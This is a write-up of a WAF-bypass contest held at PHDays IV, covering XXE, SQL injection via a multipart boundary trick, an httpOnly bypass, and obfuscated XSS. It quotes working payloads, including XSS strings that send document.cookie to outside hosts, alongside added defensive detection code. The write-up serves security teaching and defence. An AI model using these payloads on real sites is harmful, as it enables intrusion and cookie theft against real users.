
Analysis of tasks of the competition WAF Bypass on PHDays IV

This year at Positive Hack Days we held a WAF Bypass competition in which participants could try their hand at bypassing PT Application Firewall. For us, such a contest was an excellent chance to test the product in real combat, because the conference brought together the best experts in the field of information security.

For the competition we prepared a set of tasks. Each was a scenario with a typical vulnerability that had to be exploited to obtain the flag. Every task had a solution, but the solutions were not always obvious. Participants had access to a report from scanning the tasks' source code with another of our products, Application Inspector. In this post we describe the tasks, the bypasses, and what we learned.


1. XXE


The first task was an XML-RPC server in PHP vulnerable to XML External Entity injection. Application Inspector spotted the vulnerability:



The task was a warm-up, and Application Firewall was configured to block only the simplest XXE:

<!DOCTYPE input [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><input>&xxe;</input> 

The flag could be obtained using, for example, parameter entities:

 <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY % xxe SYSTEM "flag" > %xxe; ]> <body> <method a='a'>test</method> </body> 

Or through DOCTYPE:

 <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE body SYSTEM "flag"> <body><method>test</method></body> 
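A WAF-side screen that covers all three forms shown above, not just the simple one the task blocked. This is an added example written for this post, not the product's signature; the five XML samples are the post's three payloads plus two constructed benign documents.

```python
import re

# The three payloads quoted from the post, plus two constructed benign documents.
SIMPLE_XXE = '<!DOCTYPE input [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><input>&xxe;</input>'
PARAM_ENTITY = ('<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > '
                '<!ENTITY % xxe SYSTEM "flag" > %xxe; ]> <body> <method a=\'a\'>test</method> </body>')
EXTERNAL_DTD = '<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE body SYSTEM "flag"> <body><method>test</method></body>'
NO_DOCTYPE = '<?xml version="1.0"?><body><method>test</method></body>'
INTERNAL_ONLY = '<!DOCTYPE body [<!ENTITY greet "hello">]><body>&greet;</body>'

# head = everything between DOCTYPE and the internal subset; subset = the [...] part.
DOCTYPE_RE = re.compile(r'<!DOCTYPE\b(?P<head>[^\[>]*)(?:\[(?P<subset>.*?)\])?\s*>', re.S | re.I)

def xxe_indicators(xml):
    """Reasons to reject a document before it reaches the XML parser.

    A signature that only matches '<!ENTITY name SYSTEM ...>' misses the other
    two payloads, so every way a DOCTYPE can pull in external content is checked:
    an external identifier on the DOCTYPE itself, SYSTEM/PUBLIC in any entity
    declaration, and parameter entities (declared or referenced)."""
    m = DOCTYPE_RE.search(xml)
    if not m:
        return []
    head, subset = m.group('head'), m.group('subset') or ''
    reasons = []
    if re.search(r'\b(SYSTEM|PUBLIC)\b', head, re.I):
        reasons.append('external DTD on DOCTYPE')
    if re.search(r'<!ENTITY\s+%', subset, re.I):
        reasons.append('parameter entity declared')
    if re.search(r'<!ENTITY[^>]*\b(SYSTEM|PUBLIC)\b', subset, re.I):
        reasons.append('external entity declared')
    if re.search(r'%\w+;', subset):
        reasons.append('parameter entity referenced in internal subset')
    return reasons
```

This is a screen in front of the application; the XML parser itself should still be configured not to load external entities or DTDs.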

2. SQL Injection


The purpose of this task was to get a flag from the database using SQL injection. Most participants tried to bypass the filter instead of paying attention to the hint: the point was to spot an error in the WAF configuration, namely incorrect data normalization. One of the most serious problems of modern WAFs is the normalization of incoming data in HTTP requests; errors there can lead to a bypass at the protocol level. As Stefan Esser noted back in 2009 in his presentation "Shocking News in PHP Exploitation", WAF developers try to build one HTTP parser for all existing implementations, which is obviously impossible. The approach implemented in PT Application Firewall is normalization that takes the specifics of the backend into account. Normalization was disabled for this task, which allowed the following bypass:

POST /news.php HTTP/1.1
Host: task2.waf-bypass.phdays.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: multipart/form-data; boundary=------,xxxx
Content-Length: 191

------,xxxx
Content-Disposition: form-data; name="img"; filename="img.gif"

GIF89a
------
Content-Disposition: form-data; name="id"

1' union select null,null,flag,null from flag limit 1 offset 1-- -
--------
------,xxxx--

PHP has its own peculiar multipart parser, which reads the boundary value in the Content-Type header only up to the first comma. Normal parsers take the full value. Therefore, without normalization, the WAF assumes the request contains only a file upload, which the filter does not check. But PHP "sees" in this request the id parameter with the payload.
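The parser differential described above, as an added example that is not part of the original post or the product: a minimal line-based multipart parser (a model, not PHP's or any WAF's code) run twice over one constructed body, once with the full boundary as a naive WAF would read it and once truncated at the comma as PHP's parser does, to report which fields the WAF never inspected.

```python
import re

def boundary_from_content_type(content_type, php_style=False):
    # php_style mimics PHP's rfc1867 multipart parser, which cuts the boundary
    # at the first comma; other parsers (and a naive WAF) keep the whole value.
    boundary = re.search(r'boundary=([^;]*)', content_type).group(1).strip().strip('"')
    return boundary.split(',', 1)[0] if php_style else boundary

def parse_multipart(body, boundary):
    """Line-based multipart model written for this example (not PHP's or any WAF's
    code): a line is a delimiter only when it equals '--' + boundary exactly, lines
    before the first delimiter are skipped; returns {name: (filename, part body)}."""
    delim, closing, parts, current = '--' + boundary, '--' + boundary + '--', {}, None
    for line in body.split('\r\n') + [closing]:
        if line in (delim, closing):
            if current is not None and '' in current:  # headers end at the first empty line
                blank = current.index('')
                for h in current[:blank]:
                    name = re.search(r'(?<!file)name="([^"]*)"', h)
                    fname = re.search(r'filename="([^"]*)"', h)
                    if h.lower().startswith('content-disposition:') and name:
                        parts[name.group(1)] = (fname.group(1) if fname else None,
                                                '\r\n'.join(current[blank + 1:]))
            current = [] if line == delim else None
        elif current is not None:
            current.append(line)
    return parts

def fields_hidden_from_waf(content_type, body):
    # Fields the backend (PHP-style) parse exposes but a full-boundary parse, i.e. a
    # WAF without backend-aware normalization, never inspects; non-empty means a gap.
    waf_view = parse_multipart(body, boundary_from_content_type(content_type))
    php_view = parse_multipart(body, boundary_from_content_type(content_type, True))
    return sorted(set(php_view) - set(waf_view))

# Constructed request body modelled on the task-2 bypass: a comma in the boundary.
CONTENT_TYPE = 'multipart/form-data; boundary=abc,xyz'
BODY = '\r\n'.join([
    '--abc,xyz',
    'Content-Disposition: form-data; name="img"; filename="img.gif"',
    '',
    'GIF89a',
    '--abc',                      # what PHP treats as the delimiter
    'Content-Disposition: form-data; name="id"',
    '',
    'hidden-value',               # the WAF sees this only as bytes inside the "img" file
    '--abc',
    '--abc,xyz--',                # what the WAF treats as the closing delimiter
])
```

Calling fields_hidden_from_waf(CONTENT_TYPE, BODY) returns ['id']: the WAF view contains a single file part "img", while the PHP view contains the form field "id". The defensive conclusion is the one the post draws: inspect the request as the backend's parser will see it.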

3. httpOnly


This task and all subsequent ones focus on client-side vulnerabilities. For the contest we made a Selenium bot with a cookie containing the flag; the goal of the task was to steal that cookie.

httpOnly is a cookie flag that denies JavaScript access to the cookie's value (hence the name).

Vulnerable script code:

<h4>httpOnly bypass</h4>
<p>In this task you need to bypass httpOnly and steal bot cookies using <a href="http://waf-bypass.phdays.com/#bot">http://waf-bypass.phdays.com/#bot</a>. All XSS checks are disabled, but there is an intentional bug, try to find it!</p>
<?php
if(!isset($_GET['name'])) die("<p>Please provide name</p>");
if($_SERVER['REMOTE_ADDR'] == '127.0.0.1') {
    setcookie('flag', $_GET['name'] . '-' . file_get_contents('./flag'));
} else {
    setcookie('flag', $_GET['name'] . '-' . md5(mt_rand()));
}
echo '<p>' . $_GET['name'] . '</p>';
?>

Two things stand out here: the user-supplied value ends up in the cookie value, and the input is echoed as is. Obviously, when the bot follows a link carrying the XSS it will not send its cookie because of httpOnly, which Application Firewall adds. To bypass the protection it was necessary to put the string HttpOnly into the cookie value; the WAF would then consider the flag already set and not add its own:

httponly.php?name=;HttpOnly
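How a WAF should decide whether HttpOnly is already set, as an added example written for this post (not the product's code): the flag counts only when it appears as an attribute token after a ';', never as a substring of the cookie value. The sample headers are constructed; they assume PHP's setcookie() URL-encodes the value, so the ';' injected via ?name=;HttpOnly arrives as %3B while the word HttpOnly survives.

```python
def has_httponly(set_cookie_header):
    """True only when HttpOnly is present as a real cookie attribute.

    Set-Cookie is 'name=value' followed by ';'-separated attributes, so the flag
    is looked for among the attribute tokens and the value is ignored."""
    _name_value, *attributes = set_cookie_header.split(';')
    return any(a.strip().lower() == 'httponly' for a in attributes)

def naive_has_httponly(set_cookie_header):
    # A check that does not distinguish the value from the attributes: the word
    # HttpOnly inside the cookie value satisfies it although no attribute was set,
    # which is the behaviour the task exploited.
    return 'httponly' in set_cookie_header.lower()

def enforce_httponly(set_cookie_header):
    """Append HttpOnly only when it is genuinely missing (what the WAF was meant to do)."""
    if has_httponly(set_cookie_header):
        return set_cookie_header
    return set_cookie_header.rstrip('; \t') + '; HttpOnly'

# Constructed Set-Cookie headers as the task's script would emit them
# (value URL-encoded by setcookie(); the flag part replaced by a placeholder).
NORMAL = 'flag=alice-0123abcd; path=/'
INJECTED = 'flag=%3BHttpOnly-0123abcd; path=/'
PROTECTED = 'flag=alice-0123abcd; path=/; HttpOnly'
```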

4. Anomaly


In this task participants were invited to test the anomaly detection mechanism based on the machine-learning algorithms underlying PT Application Firewall. A data model was prepared that was overfitted on disparate values. The essence of the bypass was to compose a string that satisfied the parameters of the trained statistical model. This task also contained a cross-site scripting vulnerability, but httpOnly was not set. Only two participants managed to bypass even the statistical model we had weakened:

 aaaaaaaaaaaa ... [snip] ... aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaav%3Cvideo++src=//secsem.ru+aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaavaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa+onerror=src%2b=document.cookie+/%3E 

Note that to "dilute" the special characters the WAF reacted to, the payload references the tag's src attribute from another attribute (onerror) placed far enough away that the string does not exceed the model's threshold.

5. RegEx


The participants' goal in this task was to bypass a regular-expression filter and steal the bot's cookie. Regex-based signatures are an integral part of any traditional WAF. We once again confirmed that a good WAF should not rely on "regexes" alone. Here are some of the bypasses:

 <img src = http://dsec.ru/bitrix/templates/dsec/img/logo.png onload = \"\\u0064\\u006F\\u0063\\u0075\\u006D\\u0065\\u006E\\u0074.write('<im\\u0067 src = http://sergeybelove.ru?ccc='%2b\\u0064\\u006F\\u0063\\u0075\\u006D\\u0065\\u006E\\u0074.cooki\\u0065%2b'>')\"> 

 1%3Cvideo%20%20src%3dx%20onerror%3d%0Asrc='ht'%2b'tp:'%2b'//'+d\\u006fcument['\\x63ookie']%3E%3C/video%3E 

 <svg onload=\"var xStuff=HTMLElement['con'%2b'structor'],yStuff=xStuff('var img=new'%2b' Ima'%2b'ge('%2b') ;im'%2b'g.sr'%2b'c=\\'http:/'%2b'/labs.tom.vg/cookie=\\'%2bdoc'%2b'ument.coo'%2b'kie;doc'%2b'ument.doc'%2b'umentEl'%2b'ement.appe'%2b'ndCh'%2b'ild'%2b'('%2b'img) ;'),zStuff=yStuff()\"> 

6. Sanitize


In the final task participants were asked to perform an XSS while bypassing a protection whose essence was to HTML-entity-encode the incoming values reflected in the response:

GET /sanitize.php?name=<script>alert(1)</script> HTTP/1.0

->

HTTP/1.0 200 OK ... Hello, &lt;script&gt;alert(1)&lt;/script&gt;!

It would seem an iron-clad defense, but there was still a bypass. To find the value coming from the user, the entire body of the HTTP response is searched, and that body may contain other HTML tags. The bypass was to make the WAF escape tags already present in the response, which let the target payload escape filtering.

Results


The winners were a team from Moscow State University: Georgy Noseyevich, Andrey Petukhov and Alexander Razdobarov, who solved all the tasks! Second place went to Ivan Novikov (d0znpp), and third to the speaker from Belgium, Tom Van Goethem. The winners received valuable prizes: an Apple iPad Air, a Sony Xperia Z2 and a one-year Burp Suite Pro license, respectively.



Some statistics: over the two days of the competition 122644 requests were blocked, 101 participants registered, and only 11 managed to get at least one flag.

The dynamics of the first day



The dynamics of the second day




Attack statistics



Statistics on the rear




And for the competition we made a great visualization with the help of logstalgia.



That's all!

Arseny Reutov ( Raz0r ), Dmitry Nagibin and PT Application Firewall Team

Source: https://habr.com/ru/post/229479/

